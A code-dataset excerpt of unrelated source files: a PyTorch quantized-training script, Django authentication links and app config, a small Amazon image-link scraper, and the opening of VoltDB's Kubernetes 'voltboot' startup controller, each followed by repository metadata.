    evaluate from a checkpoint, run the training loop with optional
    quantization / kernel-sharing ("new" versions), and report timings.

    :param args: sacred-injected config namespace (see ``hyperparam``).
    :return: best top-1 validation accuracy (or the evaluated top-1 when
             running with ``--evaluate``).
    """
    global arch_name
    opt = args
    if opt.cuda and not torch.cuda.is_available():
        raise Exception('No GPU found, please run without --cuda')
    # set model name
    arch_name = set_arch_name(opt)
    # logging at sacred
    ex.log_scalar('architecture', arch_name)
    ex.log_scalar('dataset', opt.dataset)
    print('\n=> creating model \'{}\''.format(arch_name))
    # Model constructors return None for unsupported parameter combinations.
    model = models.__dict__[opt.arch](data=opt.dataset, num_layers=opt.layers,
                                      width_mult=opt.width_mult, batch_norm=opt.bn,
                                      drop_rate=opt.drop_rate)
    if model is None:
        print('==> unavailable model parameters!! exit...\n')
        exit()
    criterion = nn.CrossEntropyLoss()
    optimizer = optim.SGD(model.parameters(), lr=opt.lr,
                          momentum=opt.momentum, weight_decay=opt.weight_decay,
                          nesterov=True)
    start_epoch = 0
    n_retrain = 0
    if opt.cuda:
        torch.cuda.set_device(opt.gpuids[0])
        with torch.cuda.device(opt.gpuids[0]):
            model = model.cuda()
            criterion = criterion.cuda()
        # Multi-GPU wrapper; later code unwraps via ``model.module`` (see
        # new_regularizer).
        model = nn.DataParallel(model, device_ids=opt.gpuids,
                                output_device=opt.gpuids[0])
        cudnn.benchmark = True
    # checkpoint file
    ckpt_dir = pathlib.Path('checkpoint')
    ckpt_file = ckpt_dir / arch_name / opt.dataset / opt.ckpt
    # for resuming training
    if opt.resume:
        if isfile(ckpt_file):
            print('==> Loading Checkpoint \'{}\''.format(opt.ckpt))
            checkpoint = load_model(model, ckpt_file,
                                    main_gpu=opt.gpuids[0], use_cuda=opt.cuda)
            start_epoch = checkpoint['epoch']
            optimizer.load_state_dict(checkpoint['optimizer'])
            print('==> Loaded Checkpoint \'{}\' (epoch {})'.format(
                opt.ckpt, start_epoch))
        else:
            print('==> no checkpoint found \'{}\''.format(
                opt.ckpt))
            exit()
    # Data loading
    print('==> Load data..')
    start_time = time.time()
    train_loader, val_loader = DataLoader(opt.batch_size, opt.workers,
                                          opt.dataset, opt.datapath,
                                          opt.cuda)
    elapsed_time = time.time() - start_time
    print('===> Data loading time: {:,}m {:.2f}s'.format(
        int(elapsed_time//60), elapsed_time%60))
    print('===> Data loaded..')
    # for evaluation
    if opt.evaluate:
        if isfile(ckpt_file):
            print('==> Loading Checkpoint \'{}\''.format(opt.ckpt))
            checkpoint = load_model(model, ckpt_file,
                                    main_gpu=opt.gpuids[0], use_cuda=opt.cuda)
            epoch = checkpoint['epoch']
            # logging at sacred
            ex.log_scalar('best_epoch', epoch)
            if opt.new:
                # logging at sacred
                ex.log_scalar('version', checkpoint['version'])
                if checkpoint['version'] in ['v2q', 'v2qq', 'v2f']:
                    ex.log_scalar('epsilon', opt.epsilon)
                # "new" checkpoints store kernel indices instead of full
                # weights; reconstruct the weights before evaluation.
                print('===> Change indices to weights..')
                idxtoweight(opt, model, checkpoint['idx'], checkpoint['version'])
            print('==> Loaded Checkpoint \'{}\' (epoch {})'.format(
                opt.ckpt, epoch))
            # evaluate on validation set
            print('\n===> [ Evaluation ]')
            start_time = time.time()
            acc1, acc5 = validate(opt, val_loader, None, model, criterion)
            elapsed_time = time.time() - start_time
            acc1 = round(acc1.item(), 4)
            acc5 = round(acc5.item(), 4)
            ckpt_name = '{}-{}-{}'.format(arch_name, opt.dataset, opt.ckpt[:-4])
            save_eval([ckpt_name, acc1, acc5])
            print('====> {:.2f} seconds to evaluate this model\n'.format(
                elapsed_time))
            return acc1
        else:
            print('==> no checkpoint found \'{}\''.format(
                opt.ckpt))
            exit()
    # for retraining
    if opt.retrain:
        if isfile(ckpt_file):
            print('==> Loading Checkpoint \'{}\''.format(opt.ckpt))
            checkpoint = load_model(model, ckpt_file,
                                    main_gpu=opt.gpuids[0], use_cuda=opt.cuda)
            # Older checkpoints may not carry 'n_retrain'; treat as first retrain.
            try:
                n_retrain = checkpoint['n_retrain'] + 1
            except:
                n_retrain = 1
            # logging at sacred
            ex.log_scalar('n_retrain', n_retrain)
            if opt.new:
                if opt.version != checkpoint['version']:
                    print('version argument is different with saved checkpoint version!!')
                    exit()
                # logging at sacred
                ex.log_scalar('version', checkpoint['version'])
                if checkpoint['version'] in ['v2q', 'v2qq', 'v2f']:
                    ex.log_scalar('epsilon', opt.epsilon)
                print('===> Change indices to weights..')
                idxtoweight(opt, model, checkpoint['idx'], opt.version)
            print('==> Loaded Checkpoint \'{}\' (epoch {})'.format(
                opt.ckpt, checkpoint['epoch']))
        else:
            print('==> no checkpoint found \'{}\''.format(
                opt.ckpt))
            exit()
    # train...
    best_acc1 = 0.0
    train_time = 0.0
    validate_time = 0.0
    extra_time = 0.0
    for epoch in range(start_epoch, opt.epochs):
        adjust_learning_rate(optimizer, epoch, opt)
        # Assemble a human-readable banner describing this epoch's settings.
        train_info = '\n==> {}/{} '.format(arch_name, opt.dataset)
        if opt.new:
            train_info += 'new_{} '.format(opt.version)
            if opt.version in ['v2q', 'v2qq', 'v2f']:
                train_info += 'a{}b{}bit '.format(opt.quant_bit_a, opt.quant_bit_b)
            elif opt.version in ['v2qnb', 'v2qqnb']:
                train_info += 'a{}bit '.format(opt.quant_bit_a)
            if opt.version in ['v2qq', 'v2f', 'v2qqnb']:
                train_info += 'w{}bit '.format(opt.quant_bit)
        else:
            if opt.quant:
                train_info += '{}bit '.format(opt.quant_bit)
        if opt.retrain:
            train_info += '{}-th re'.format(n_retrain)
        train_info += 'training'
        if opt.new:
            train_info += '\n==> Version: {} '.format(opt.version)
            if opt.tv_loss:
                train_info += 'with TV loss '
            train_info += '/ SaveEpoch: {}'.format(opt.save_epoch)
        if epoch < opt.warmup_epoch and opt.version.find('v2') != -1:
            train_info += '\n==> V2 Warmup epochs up to {} epochs'.format(
                opt.warmup_epoch)
        train_info += '\n==> Epoch: {}, lr = {}'.format(
            epoch, optimizer.param_groups[0]["lr"])
        print(train_info)
        # train for one epoch
        print('===> [ Training ]')
        start_time = time.time()
        acc1_train, acc5_train = train(opt, train_loader,
                                       epoch=epoch, model=model,
                                       criterion=criterion, optimizer=optimizer)
        elapsed_time = time.time() - start_time
        train_time += elapsed_time
        print('====> {:.2f} seconds to train this epoch\n'.format(
            elapsed_time))
        # Post-epoch "extra" work: quantization and/or kernel sharing.
        start_time = time.time()
        if opt.new:
            if opt.version in ['v2qq', 'v2f', 'v2qqnb']:
                print('==> {}bit Quantization...'.format(opt.quant_bit))
                quantize(model, opt, opt.quant_bit)
                if arch_name in hasPWConvArchs:
                    quantize(model, opt, opt.quant_bit, is_pw=True)
            if epoch < opt.warmup_epoch:
                pass
            elif (epoch-opt.warmup_epoch+1) % opt.save_epoch == 0:  # every 'opt.save_epoch' epochs
                print('===> Change kernels using {}'.format(opt.version))
                indices = find_similar_kernel_n_change(opt, model, opt.version)
                if opt.chk_save:
                    print('====> Save index and kernel for analysis')
                    save_index_n_kernel(opt, arch_name, epoch, model, indices, n_retrain)
        else:
            if opt.quant:
                print('==> {}bit Quantization...'.format(opt.quant_bit))
                quantize(model, opt, opt.quant_bit)
                if arch_name in hasPWConvArchs:
                    print('==> {}bit pwconv Quantization...'.format(opt.quant_bit))
                    quantize(model, opt, opt.quant_bit, is_pw=True)
        elapsed_time = time.time() - start_time
        extra_time += elapsed_time
        print('====> {:.2f} seconds for extra time this epoch\n'.format(
            elapsed_time))
        # evaluate on validation set
        print('===> [ Validation ]')
        start_time = time.time()
        acc1_valid, acc5_valid = validate(opt, val_loader, epoch, model, criterion)
        elapsed_time = time.time() - start_time
        validate_time += elapsed_time
        print('====> {:.2f} seconds to validate this epoch\n'.format(
            elapsed_time))
        acc1_train = round(acc1_train.item(), 4)
        acc5_train = round(acc5_train.item(), 4)
        acc1_valid = round(acc1_valid.item(), 4)
        acc5_valid = round(acc5_valid.item(), 4)
        # remember best Acc@1 and save checkpoint and summary csv file
        state = {'epoch': epoch + 1,
                 'model': model.state_dict(),
                 'optimizer': optimizer.state_dict(),
                 'n_retrain': n_retrain}
        summary = [epoch, acc1_train, acc5_train, acc1_valid, acc5_valid]
        if not opt.new:
            state['new'] = False
            state['version'] = ''
            state['idx'] = []
            is_best = acc1_valid > best_acc1
            best_acc1 = max(acc1_valid, best_acc1)
            save_model(arch_name, state, epoch, is_best, opt, n_retrain)
            save_summary(arch_name, summary, opt, n_retrain)
        else:
            # NOTE(review): in "new" mode, checkpoints (and best_acc1) are only
            # updated on kernel-sharing epochs; warmup epochs save nothing.
            if epoch < opt.warmup_epoch:
                pass
            elif (epoch-opt.warmup_epoch+1) % opt.save_epoch == 0:  # every 'opt.save_epoch' epochs
                state['new'] = True
                state['version'] = opt.version
                state['idx'] = indices
                is_best = acc1_valid > best_acc1
                best_acc1 = max(acc1_valid, best_acc1)
                save_model(arch_name, state, epoch, is_best, opt, n_retrain)
                save_summary(arch_name, summary, opt, n_retrain)
    # calculate time
    avg_train_time = train_time / (opt.epochs - start_epoch)
    avg_valid_time = validate_time / (opt.epochs - start_epoch)
    avg_extra_time = extra_time / (opt.epochs - start_epoch)
    total_train_time = train_time + validate_time + extra_time
    print('====> average training time each epoch: {:,}m {:.2f}s'.format(
        int(avg_train_time//60), avg_train_time%60))
    print('====> average validation time each epoch: {:,}m {:.2f}s'.format(
        int(avg_valid_time//60), avg_valid_time%60))
    print('====> average extra time each epoch: {:,}m {:.2f}s'.format(
        int(avg_extra_time//60), avg_extra_time%60))
    print('====> training time: {}h {}m {:.2f}s'.format(
        int(train_time//3600), int((train_time%3600)//60), train_time%60))
    print('====> validation time: {}h {}m {:.2f}s'.format(
        int(validate_time//3600), int((validate_time%3600)//60), validate_time%60))
    print('====> extra time: {}h {}m {:.2f}s'.format(
        int(extra_time//3600), int((extra_time%3600)//60), extra_time%60))
    print('====> total training time: {}h {}m {:.2f}s'.format(
        int(total_train_time//3600), int((total_train_time%3600)//60), total_train_time%60))
    return best_acc1
def train(opt, train_loader, **kwargs):
    r"""Train model each epoch.

    Runs one full pass over ``train_loader`` with SGD, optionally adding a
    total-variation regularizer (``opt.tv_loss``), updates running meters,
    and logs epoch averages to sacred.

    :param opt: config namespace (uses cuda, tv_loss, print_freq).
    :param train_loader: iterable of (input, target) batches.
    :keyword epoch, model, criterion, optimizer: training context.
    :return: (top-1 average accuracy, top-5 average accuracy) for the epoch.
    """
    epoch = kwargs.get('epoch')
    model = kwargs.get('model')
    criterion = kwargs.get('criterion')
    optimizer = kwargs.get('optimizer')
    batch_time = AverageMeter('Time', ':6.3f')
    data_time = AverageMeter('Data', ':6.3f')
    losses = AverageMeter('Loss', ':.4e')
    top1 = AverageMeter('Acc@1', ':6.2f')
    top5 = AverageMeter('Acc@5', ':6.2f')
    progress = ProgressMeter(len(train_loader), batch_time, data_time,
                             losses, top1, top5, prefix="Epoch: [{}]".format(epoch))
    # switch to train mode
    model.train()
    end = time.time()
    for i, (input, target) in enumerate(train_loader):
        # measure data loading time
        data_time.update(time.time() - end)
        if opt.cuda:
            target = target.cuda(non_blocking=True)
        # compute output
        output = model(input)
        loss = criterion(output, target)
        # option 1) add total variation loss
        if opt.tv_loss:
            regularizer = new_regularizer(opt, model, 'tv')
            loss += regularizer
        # measure accuracy and record loss
        acc1, acc5 = accuracy(output, target, topk=(1, 5))
        losses.update(loss.item(), input.size(0))
        top1.update(acc1[0], input.size(0))
        top5.update(acc5[0], input.size(0))
        # compute gradient and do SGD step
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        # measure elapsed time
        batch_time.update(time.time() - end)
        if i % opt.print_freq == 0:
            progress.print(i)
        end = time.time()
    print('====> Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
          .format(top1=top1, top5=top5))
    # logging at sacred
    ex.log_scalar('train.loss', losses.avg, epoch)
    ex.log_scalar('train.top1', top1.avg.item(), epoch)
    ex.log_scalar('train.top5', top5.avg.item(), epoch)
    return top1.avg, top5.avg
def validate(opt, val_loader, epoch, model, criterion):
    r"""Validate model each epoch and evaluation.

    Runs one pass over ``val_loader`` in eval mode (no gradients), profiling
    each forward pass with torch.autograd.profiler, and logs averages to
    sacred.

    :param epoch: epoch index for sacred logging (None during --evaluate).
    :return: (top-1 average accuracy, top-5 average accuracy).
    """
    batch_time = AverageMeter('Time', ':6.3f')
    losses = AverageMeter('Loss', ':.4e')
    top1 = AverageMeter('Acc@1', ':6.2f')
    top5 = AverageMeter('Acc@5', ':6.2f')
    progress = ProgressMeter(len(val_loader), batch_time, losses, top1, top5,
                             prefix='Test: ')
    # switch to evaluate mode
    model.eval()
    with torch.no_grad():
        end = time.time()
        for i, (input, target) in enumerate(val_loader):
            if opt.cuda:
                target = target.cuda(non_blocking=True)
            # compute output
            # Profile only the forward pass; ``prof`` is rebound every batch.
            with profiler.profile(use_cuda=True, profile_memory=True, record_shapes=True) as prof:
                output = model(input)
            loss = criterion(output, target)
            # measure accuracy and record loss
            acc1, acc5 = accuracy(output, target, topk=(1, 5))
            losses.update(loss.item(), input.size(0))
            top1.update(acc1[0], input.size(0))
            top5.update(acc5[0], input.size(0))
            # measure elapsed time
            batch_time.update(time.time() - end)
            if i % opt.print_freq == 0:
                progress.print(i)
            end = time.time()
        print('====> Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
              .format(top1=top1, top5=top5))
        # NOTE(review): this prints the profile of the LAST batch only, since
        # ``prof`` is overwritten on every iteration — confirm intentional.
        print(prof.key_averages().table(sort_by="cuda_memory_usage"))
    # logging at sacred
    ex.log_scalar('test.loss', losses.avg, epoch)
    ex.log_scalar('test.top1', top1.avg.item(), epoch)
    ex.log_scalar('test.top5', top5.avg.item(), epoch)
    return top1.avg, top5.avg
def new_regularizer(opt, model, regularizer_name='tv'):
    r"""Add new regularizer

    Arguments
    ---------
    regularizer_name (str): name of regularizer
    - 'tv': total variation loss (https://towardsdatascience.com/pytorch-implementation-of-perceptual-losses-for-real-time-style-transfer-8d608e2e9902)

    Returns the scalar regularization term computed over all (dw/pw)
    convolution weights, scaled by ``opt.tvls``.

    The try/except pairs below handle the two model layouts produced in
    ``main``: ``model.module.*`` when the model is wrapped in
    nn.DataParallel, plain ``model.*`` otherwise.
    """
    # get all convolution weights and reshape
    if opt.arch in hasDWConvArchs:
        # NOTE(review): this branch keys off ``opt.arch`` while the pwconv
        # branches below use the global ``arch_name`` — confirm consistency.
        try:
            num_layer = model.module.get_num_dwconv_layer()
            conv_all = model.module.get_layer_dwconv(0).weight
        except:
            num_layer = model.get_num_dwconv_layer()
            conv_all = model.get_layer_dwconv(0).weight
        conv_all = conv_all.view(len(conv_all), -1)
        for i in range(1, num_layer):
            try:
                conv_cur = model.module.get_layer_dwconv(i).weight
            except:
                conv_cur = model.get_layer_dwconv(i).weight
            conv_cur = conv_cur.view(len(conv_cur), -1)
            conv_all = torch.cat((conv_all, conv_cur), 0)
    else:
        # Standard convs are flattened to rows of 9 (3x3 kernels).
        try:
            num_layer = model.module.get_num_conv_layer()
            conv_all = model.module.get_layer_conv(0).weight.view(-1, 9)
        except:
            num_layer = model.get_num_conv_layer()
            conv_all = model.get_layer_conv(0).weight.view(-1, 9)
        for i in range(1, num_layer):
            try:
                conv_cur = model.module.get_layer_conv(i).weight.view(-1, 9)
            except:
                conv_cur = model.get_layer_conv(i).weight.view(-1, 9)
            conv_all = torch.cat((conv_all, conv_cur), 0)
    if arch_name in hasPWConvArchs:
        # Pointwise conv weights are flattened to rows of ``pw_bind_size``.
        try:
            num_pwlayer = model.module.get_num_pwconv_layer()
            pwconv_all = model.module.get_layer_pwconv(0).weight
        except:
            num_pwlayer = model.get_num_pwconv_layer()
            pwconv_all = model.get_layer_pwconv(0).weight
        pwconv_all = pwconv_all.view(-1, opt.pw_bind_size)
        for i in range(1, num_pwlayer):
            try:
                pwconv_cur = model.module.get_layer_pwconv(i).weight
            except:
                pwconv_cur = model.get_layer_pwconv(i).weight
            pwconv_cur = pwconv_cur.view(-1, opt.pw_bind_size)
            pwconv_all = torch.cat((pwconv_all, pwconv_cur), 0)
    if regularizer_name == 'tv':
        # Anisotropic total variation: L1 of horizontal plus vertical
        # neighbor differences over the stacked weight matrix.
        regularizer = torch.sum(torch.abs(conv_all[:, :-1] - conv_all[:, 1:])) + torch.sum(torch.abs(conv_all[:-1, :] - conv_all[1:, :]))
        if arch_name in hasPWConvArchs:
            regularizer += torch.sum(torch.abs(pwconv_all[:, :-1] - pwconv_all[:, 1:])) + torch.sum(torch.abs(pwconv_all[:-1, :] - pwconv_all[1:, :]))
        regularizer = opt.tvls * regularizer
    else:
        # Only 'tv' is implemented; anything else fails fast.
        regularizer = 0.0
        raise NotImplementedError
    return regularizer
if __name__ == '__main__':
    # Time the whole sacred run and report a wall-clock summary.
    started = time.time()
    ex.run()
    total = time.time() - started
    hours, remainder = divmod(total, 3600)
    minutes, seconds = divmod(remainder, 60)
    print('====> total time: {}h {}m {:.2f}s'.format(
        int(hours), int(minutes), seconds))
| [
"ho7719@gmail.com"
] | ho7719@gmail.com |
7fd63d245dbd1ed1b3c96be002435fe20c90baf8 | 44bbfe1c9a7f16e632cdd27c2de058033b33ea6d | /mayan/apps/authentication/links.py | dc7385bd9ff9101a3656851017b7786194679579 | [
"Apache-2.0"
] | permissive | lxny2004/open-paperless | 34025c3e8ac7b4236b0d8fc5ca27fc11d50869bc | a8b45f8f0ee5d7a1b9afca5291c6bfaae3db8280 | refs/heads/master | 2020-04-27T04:46:25.992405 | 2019-03-06T03:30:15 | 2019-03-06T03:30:15 | 174,064,366 | 0 | 0 | NOASSERTION | 2019-03-06T03:29:20 | 2019-03-06T03:29:20 | null | UTF-8 | Python | false | false | 478 | py | from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from navigation import Link
def has_usable_password(context):
    """Link condition: True when the request's user has a usable password.

    Bug fix: ``has_usable_password`` is a *method* on Django's user model; the
    original referenced it without calling it, so the condition always
    evaluated truthy (a bound method object). It is now actually invoked.

    :param context: template/navigation context containing 'request'.
    :return: result of ``user.has_usable_password()``.
    """
    return context['request'].user.has_usable_password()
# Menu link that logs the current user out.
link_logout = Link(
    icon='fa fa-sign-out', text=_('Logout'), view='authentication:logout_view'
)
# Menu link to the password change form. The ``condition`` callable hides it
# for users without a usable password (e.g. externally-authenticated accounts).
link_password_change = Link(
    condition=has_usable_password, icon='fa fa-key', text=_('Change password'),
    view='authentication:password_change_view'
)
| [
"littlezhoubear@gmail.com"
] | littlezhoubear@gmail.com |
1cf00f3de1525c671dd6fd82eb8540bb1d901ff0 | 1efdff241b82221e633bf93d1745f6c852df287b | /attendance/attendance/webscraping.py | 9d35a78e9df37466025f2aa177b51ce7b3f51813 | [] | no_license | dhruv-kabariya/attend | 6b84821e9889dfd366a4d14fc104ffb50bcce1aa | fc4fb8565146ceb1bf86c81b4ea7afb2a74f41f8 | refs/heads/master | 2020-08-12T13:34:49.041054 | 2020-02-29T13:13:53 | 2020-02-29T13:13:53 | 214,776,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | from bs4 import BeautifulSoup as soup
from urllib.request import urlopen, Request
import time
# Scrape product image URLs from an Amazon.in search results page for a
# user-supplied search term.
search = input()
mu_url = "https://www.amazon.in/s?k=" + search + "&ref=nb_sb_noss"

# Bug fix: the Request object was built but never used (urlopen was called
# with the raw URL); pass it to urlopen.
req = Request(mu_url)
with urlopen(req) as page_code:  # context manager guarantees the socket closes
    code = page_code.read()

page_soup = soup(code, 'html.parser')
# Each search result is rendered inside one of these result-card divs.
divs = page_soup.findAll("div", {"class": "a-section a-spacing-medium"})

photo_links = []
for result in divs:
    images = result.findAll("img")
    if images:  # robustness: skip cards with no <img> instead of raising
        photo_links.append(images[0]["src"])

# Original printed photo_links[1] unconditionally; guard against short lists.
if len(photo_links) > 1:
    print(photo_links[1])
| [
"dhruvkabariya1@gmail.com"
] | dhruvkabariya1@gmail.com |
890373e747027f7865371d1230e88bca75d7b9be | f0e3ba0707d8db85afa50701b739b570259236ca | /ppts/apps.py | 083527dbb919b18619df6ea1b4dbb874ebc2d59c | [
"MIT"
] | permissive | Tubbz-alt/planningportal | bb3ff20ea3a730ccc2ca2ebef9e76198d5df8869 | ef8ed9e604c2ff7fb88836247aaa8eba0cfa235f | refs/heads/master | 2022-12-24T14:42:18.925112 | 2019-07-14T22:26:15 | 2019-07-14T22:26:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | from django.apps import AppConfig
class PptsConfig(AppConfig):
    """Django application configuration for the ``ppts`` app."""
    # Dotted module path Django uses to register the application.
    name = 'ppts'
| [
"steven.buss@gmail.com"
] | steven.buss@gmail.com |
97653dade3c09365113a5b85661c09ce7269226c | 6316b0092623c3f9fc8a0077f8d791bf8fb661e3 | /kubernetes/instance/deployment/bin/voltboot | 548695924be97358360777d0f5c6699263d53de1 | [] | no_license | litesoft-go/MockVoltDBcluster | 2d0d0f64afeb3cfc8ef61e714ff42b4c777f199d | bdd63e2318bf4d050e74b030c7908cf3358a5af6 | refs/heads/master | 2022-08-27T23:38:27.050344 | 2020-05-28T16:02:29 | 2020-05-28T16:02:29 | 253,620,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,279 | #!/usr/bin/env python
# -*-mode: python-*-
# This file is part of VoltDB.
# Copyright (C) 2020 VoltDB Inc.
# VoltDB Kubernetes node startup controller
# for use with the VoltDB operator for Kubernetes
#
# Environment variables understood by voltboot:
#
# +-----Variable name----------------+----Default value------+
# | VOLTDB_INIT_VOLUME | /etc/voltdb |
# | VOLTDB_K8S_ADAPTER_ADMIN_PORT | 8080 |
# | VOLTDB_K8S_ADAPTER_FQHOSTNAME | from socket.getfqdn() |
# | VOLTDB_K8S_ADAPTER_INTERNAL_PORT | 3021 |
# | VOLTDB_K8S_ADAPTER_PVVOLTDBROOT | /voltdbroot |
# | VOLTDB_K8S_ADAPTER_STATUS_PORT | 11780 |
# | VOLTDB_K8S_ADAPTER_VOLTBOOT_PORT | 11235 |
# | VOLTDB_CONNECTION_HOST | |
# +----------------------------------+-----------------------+
import logging
import os
import re
import shlex
import socket
import subprocess
import sys
import random
from flask import Flask, request
from werkzeug.exceptions import BadRequest, InternalServerError
from tempfile import mkstemp
from threading import Thread, Lock
from time import time, sleep, strftime, gmtime, localtime, timezone
from traceback import format_exc
# Mount point for persistent volume 'voltdbroot'
PV_MOUNTPT = os.getenv('VOLTDB_K8S_ADAPTER_PVVOLTDBROOT', '/voltdbroot')
# Hardwired name of voltdbroot directory (which is the VoltDB default)
VOLTDBROOT = 'voltdbroot'
# Assets directory: mounted by config maps
ASSETS_DIR = os.path.join(os.getenv('VOLTDB_INIT_VOLUME', '/etc/voltdb'))
# Ports used by this program for 'node up?' testing
VOLTDB_INTERNAL_INTERFACE = int(os.getenv('VOLTDB_K8S_ADAPTER_INTERNAL_PORT', 3021))
VOLTDB_HTTP_PORT = int(os.getenv('VOLTDB_K8S_ADAPTER_ADMIN_PORT', 8080))
VOLTDB_STATUS_PORT = int(os.getenv('VOLTDB_K8S_ADAPTER_STATUS_PORT', 11780))
VOLTBOOT_PORT = int(os.getenv('VOLTDB_K8S_ADAPTER_VOLTBOOT_PORT', 11235))
# URL for --host instead of hunting for it
VOLTDB_CONNECTION_HOST = os.getenv('VOLTDB_CONNECTION_HOST')
# Time spent waiting to see if voltdb has really started (distinguishes
# 'start failed' from 'crashed')
START_WAIT = 2
# Time spent waiting for DNS to have our own name (avoids waiting forever
# if there is a bug somewhere)
DNS_WAIT = 10
# Exceptions
class ForbiddenArgException(Exception):
    """Per its name, raised when a disallowed argument is encountered.

    NOTE(review): the raising site is outside this view — confirm usage.
    """
    pass
class VoltInitException(Exception):
    """Per its name, raised when 'voltdb init' fails.

    NOTE(review): the raising site is outside this view — confirm usage.
    """
    pass
class VoltStartException(Exception):
    """Per its name, raised when 'voltdb start' fails.

    NOTE(review): the raising site is outside this view — confirm usage.
    """
    pass
####
# Global data.
# Most accesses are from synchronous server code.
# The exception is STATE, which may be updated from
# a background monitoring thread, thus the lock.
HOSTINFO = None
FQHOSTNAME = None
SERVER = None
WORKING_DIR = None
VOLTBOOT_DIR = None
RESTART_ARGS = None
RESTART_NAME = None
STARTED_NAME = None
STATE = None
ST_UNINIT = 'uninitialized'
ST_STARTING = 'starting'
ST_STARTFAIL = 'start-failed'
ST_RUNNING = 'running'
ST_STOPPED = 'stopped'
ST_CRASHED = 'crashed'
state_lock = Lock()
def set_state(state):
    """Atomically set the global VoltDB state, logging real transitions only."""
    global STATE
    with state_lock:  # 'with' is equivalent to acquire/try/finally-release
        if STATE != state:
            STATE = state
            logging.info("VoltDB state is now '%s'", state)
def set_state_if(old_state, new_state):
    """Atomically transition STATE to new_state only if it equals old_state."""
    global STATE
    with state_lock:  # 'with' is equivalent to acquire/try/finally-release
        if STATE == old_state:
            STATE = new_state
            logging.info("VoltDB state is now '%s'", new_state)
####
# Main program code: a simple REST server
# that drives all activity. Loops forever.
def main():
global HOSTINFO, FQHOSTNAME, SERVER, WORKING_DIR, VOLTBOOT_DIR, \
RESTART_ARGS, RESTART_NAME, STARTED_NAME, STATE
# See if the persistent storage mount exists
if not os.path.exists(PV_MOUNTPT):
logging.error("Persistent volume '%s' is not mounted", PV_MOUNTPT)
sys.exit(1)
# Parse our own hostname, of known format, to get useful data about cluster
FQHOSTNAME = get_fqhostname()
HOSTINFO = split_fqhostname(FQHOSTNAME)
if HOSTINFO is None:
logging.error("Hostname parse error, unexpected form: '%s'", FQHOSTNAME)
sys.exit(1)
ssname, pod_ordinal, my_hostname, domain = HOSTINFO
if type(pod_ordinal) != type(0):
logging.error("Hostname parse error, expected numeric pod ordinal: '%s'", pod_ordinal)
sys.exit(1)
# Set up logger, log startup banner
setup_logging(ssname)
logging.info("==== VoltDB startup controller for Kubernetes ====")
logging.info("GMT is: " + strftime("%Y-%m-%d %H:%M:%S", gmtime()) +
" LOCALTIME is: " + strftime("%Y-%m-%d %H:%M:%S", localtime()) +
" TIMEZONE OFFSET is: " + str(timezone))
if logging.getLogger().isEnabledFor(logging.DEBUG):
logging.debug("Environment:")
for k, v in os.environ.items():
logging.debug(" %s = %s", k, v)
logging.debug("Current dir: %s", os.getcwd())
logging.info("Host: %s", FQHOSTNAME)
logging.info("Pod: %s-%s", ssname, pod_ordinal)
# The persistent volume (PV) is mounted on to a directory we know as PV_MOUNTPT.
# In that directory, i.e., in the root of the PV, we will create a container-
# specific directory with an arbitrary name (see initialization below). This
# directory is the working directory for the rest of the present program; it
# is signficant because it (the working directory) is the directory in which
# 'voltdb init' creates the voltdbroot directory, and in which 'voltdb start'
# expects to find the voltdb directory.
#
# Since the name of the working directory is arbitrary, we set up a symbolic
# link in the root of the PV, named after the stateful set, and pointing to
# the working directory.
#
# Voltboot gets its own directory under the working directory. This is used
# to store restart command info and anything else specific to voltboot.
WORKING_DIR = os.path.join(PV_MOUNTPT, ssname)
VOLTBOOT_DIR = os.path.join(WORKING_DIR, 'voltboot')
if os.path.exists(os.path.join(WORKING_DIR, VOLTDBROOT, '.initialized')):
os.chdir(WORKING_DIR)
logging.info("Working directory is: %s", WORKING_DIR)
(RESTART_ARGS, RESTART_NAME) = load_restart_args()
if RESTART_ARGS:
auto_restart(RESTART_ARGS, RESTART_NAME)
else:
set_state(ST_STOPPED)
else:
set_state(ST_UNINIT)
# Set up web server. All error responses are reported by
# an HTTP exception. We intercept the exception and
# turn it into a string-and-status; this prevents the
# default handling that returns (ugh) an HTML page.
class VoltbootServer(Flask):
def handle_http_exception(env, ex):
logging.error("%s (%s)", ex.description, ex.code)
return ex.description, ex.code
def handle_exception(env, ex):
logging.error("Unhandled: %s", ex.args[0])
return ex.args[0], 500
SERVER = VoltbootServer('voltboot')
# Endpoint processing follows. The pattern is that
# we handle the request parsing here, then call a
# processing routine that has appropriate exception
# handlers for all expected cases.
@SERVER.route('/status', methods=['GET'])
def get_status():
state = STATE # read once, we hope
logging.debug("GET /status in state '%s'", state)
resp = status_response(state, STARTED_NAME, RESTART_NAME)
if state == ST_CRASHED: # need liveness check to fail
return (resp, 424) # "failed dependency"
else:
return resp
@SERVER.route('/start', methods=['POST'])
def post_start():
logging.debug("POST /start in state '%s'", STATE)
req = request.get_json(force=True, cache=False) # may raise 400 exception
start_cmd = command_parts(req, 'startCommand', True)
restart_cmd = command_parts(req, 'restartCommand', False)
init_and_start(start_cmd, restart_cmd)
return status_response(STATE, STARTED_NAME, RESTART_NAME)
@SERVER.route('/restart-command', methods=['POST'])
def post_restart_cmd():
logging.debug("POST /restart-command")
req = request.get_json(force=True, cache=False) # may raise 400 exception
restart_cmd = command_parts(req, 'restartCommand', True)
update_restart_cmd(restart_cmd[0], restart_cmd[1])
return restart_response(RESTART_ARGS, RESTART_NAME)
@SERVER.route('/restart-command', methods=['DELETE'])
def delete_restart_cmd():
logging.debug("DELETE /restart-command")
prev_args = RESTART_ARGS
prev_name = RESTART_NAME
update_restart_cmd(None, None)
return restart_response(prev_args, prev_name)
@SERVER.route('/restart-command', methods=['GET'])
def get_restart_cmd():
logging.debug("GET /restart-command")
return restart_response(RESTART_ARGS, RESTART_NAME)
# And start serving
logging.info("Ready for commands ...")
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
SERVER.run(host='0.0.0.0', port=VOLTBOOT_PORT, debug=False, load_dotenv=False)
def status_response(state, started_name, restart_name):
    """Build the JSON body reported by the status endpoints.

    The optional name fields are included only when they have a value.
    """
    body = { "status": state }
    if started_name:
        body["startedName"] = started_name
    if restart_name:
        body["restartName"] = restart_name
    return body
def command_parts(req, name, mandatory):
    """Extract the sub-object req[name] and return its (args, name) pair.

